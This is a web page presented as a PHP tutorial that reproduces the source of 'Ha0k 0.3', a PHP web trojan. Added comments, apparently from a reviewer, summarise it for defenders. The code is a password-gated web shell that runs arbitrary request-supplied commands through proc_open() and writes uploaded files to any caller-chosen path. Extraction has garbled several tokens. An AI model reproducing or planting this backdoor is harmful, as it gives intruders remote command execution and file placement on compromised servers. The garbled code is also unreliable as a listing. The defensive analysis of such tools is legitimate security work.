Ha0k 0.3 PHP web Trojan modified version_PHP tutorial
The code is as follows:
// Analysis notes for readers of this listing. The code below is reproduced exactly as
// the page shows it: the original <?php ... ?> tags and the surrounding HTML were
// stripped, the statements were collapsed onto three long lines, and several tokens
// are visibly garbled by extraction, so it is not a runnable file as printed.
// What the visible code does:
//  - Gate: HTTP Basic credentials are checked against the hard-coded $passwd map with a
//    loose "!=" comparison; on failure it sends a WWW-Authenticate header with realm
//    "by Ha0k" and an HTTP 401.
//  - State: everything lives in the PHP session under 'cwd', 'history' and 'output';
//    a non-empty 'reset' request parameter re-initialises them.
//  - A 'cd' command is handled internally (ereg(), which was removed in PHP 7.0, plus a
//    textual path clean-up and chdir()); any other value of $_REQUEST['command'] goes
//    to proc_open() unchanged apart from alias substitution from $aliases, and stdout
//    and stderr are appended to $_SESSION['output'] through htmlspecialchars() with the
//    GB2312 charset.
//  - get_magic_quotes_gpc() (removed in PHP 8.0) and the long array $HTTP_POST_FILES
//    (removed in PHP 5.4) are used, which dates the script to the PHP 4/5 era.
//  - The trailing fragment copies an uploaded file to a caller-supplied destination
//    path taken from $_POST['remotefile'], with no check on the destination.
// Artefacts a defender can match from this code alone: the literal realm string, the
// 'Ha0k# ' prompt prefix written into the output buffer, the 'command', 'reset',
// 'userfile' and 'remotefile' request parameters, the GB2312 Content-Type header, and
// a PHP worker spawning a shell child via proc_open().
//Multiple users can be set here $passwd = array('ha0k' => 'ha0k', 'hackerdsb'=>' hackerdsb'); /* Set the alias of the command here*/ $aliases = array('ls' => 'ipconfig', 'll' => 'ls -lvhF') ; if (!isset($_SERVER['PHP_AUTH_USER'])||!isset($_SERVER['PHP_AUTH_PW'])|| !isset($passwd[$_SERVER['PHP_AUTH_USER']]) || $passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) { header('WWW-Authenticate: Basic realm="by Ha0k"'); header('HTTP/1.0 401 Unauthorized'); $authenticated = false; } else { $authenticated = true; /* Start session */ session_start( ); /* Initialize session. */ if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) { $_SESSION['cwd '] = getcwd(); //Get the current directory $_SESSION['history'] = array(); $_SESSION['output'] = ''; } if ( !empty($_REQUEST['command'])) { if (get_magic_quotes_gpc()) { //0 means off, 1 means on, filter when on /* We don't want to add the commands to the history in the * escaped form, so we remove the backslashes now. */ $_REQUEST['command'] = stripslashes($_REQUEST['command']); //will use addslashes() The string processed by the function returns as it is } /* history */ if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) != = false) //Find the value in the saved array unset($_SESSION['history'][$i]); //Destroy array_unshift($_SESSION['history'], $_REQUEST['command ']);//The array_unshift() function is to insert new elements into an array. And this new array will be added to the beginning of the original array. What the function ultimately returns is the array after inserting new elements. /* Output Ha0k# command */ $_SESSION['output'] .= 'Ha0k# ' . $_REQUEST['command'] . "n"; /* Initialize the current working directory. 
 * (review) The 'cd' branch below only normalises the path as text ('/./', '//' and
 * trailing '/..' segments) before calling chdir(); a failed chdir() is reported into
 * $_SESSION['output'] rather than thrown.
*/ if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) { $_SESSION['cwd'] = dirname(__FILE__); //Get the current directory } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) { /* The current command is a 'cd' command which we have to handle * as an internal shell command. */ if ($regs[1][0] == '/') { /* Absolute path, we use it unchanged. */ $new_dir = $regs[1]; } else { /* Relative path, we append it to the current working * directory. */ $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; } /* Transform '/./' into '/' */ while (strpos($new_dir, '/./') !== false) $new_dir = str_replace('/./', '/', $new_dir); /* Transform '//' into '/' */ while (strpos($new_dir, '//') !== false) $new_dir = str_replace('//', '/', $new_dir); /* Transform 'x/..' into '' */ while (preg_match('|/..(?!.)|', $new_dir)) $new_dir = preg_replace('|/?[^/]+/..(?!.)|', '', $new_dir); if ($new_dir == '') $new_dir = '/'; /* Try to change directory. */ if (@chdir($new_dir)) { //Change the current directory $_SESSION['cwd'] = $new_dir; } else { $_SESSION['output'] .= "cd: could not change to: $new_dirn"; } } else { /* The command is not a 'cd' command, so we execute it after * changing the directory and save the output. */ chdir($_SESSION['cwd']); //Change directory /* Alias expansion */ $length = strcspn($_REQUEST['command'], " t"); //Find the "t" string and return its position $token = substr($_REQUEST['command'], 0, $length); //Take the string from 0 to t if (isset($aliases[$token])) $_REQUEST['command'] = $aliases[$token] . 
// (review) Below, proc_open() receives the request-supplied command string after alias
// substitution; pipes 1 (stdout) and 2 (stderr) are read to EOF into the session
// output buffer, then closed. The second fragment after the first "?>" is the
// file-upload handler, which writes to the path given in $_POST['remotefile'].
substr($_REQUEST['command'], $length); $p = proc_open($_REQUEST['command'], //Execute the script array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); /* Read out and send */ while (!feof($io[1])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), //Convert special characters to HTML entities ENT_COMPAT, 'GB2312'); } /* Read out */ while (!feof($io[2])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'GB2312'); } fclose($io[1]); fclose($io[2]); proc_close($p);//Close the pipe } } /* Build the command history for use in JavaScript */ if (empty($_SESSION['history'])) { $js_command_hist = '""'; } else { $escaped = array_map('addslashes', $_SESSION['history']); $js_command_hist = '"", "' . implode('", "', $escaped) . '"';//Turn the array into a string } } header('Content-Type: text/html; charset=GB2312'); echo '' . "n"; ?> if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) { copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']); //echo "File upload succeeded: " . $HTTP_POST_FILES['userfile']['name']; } ?> "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">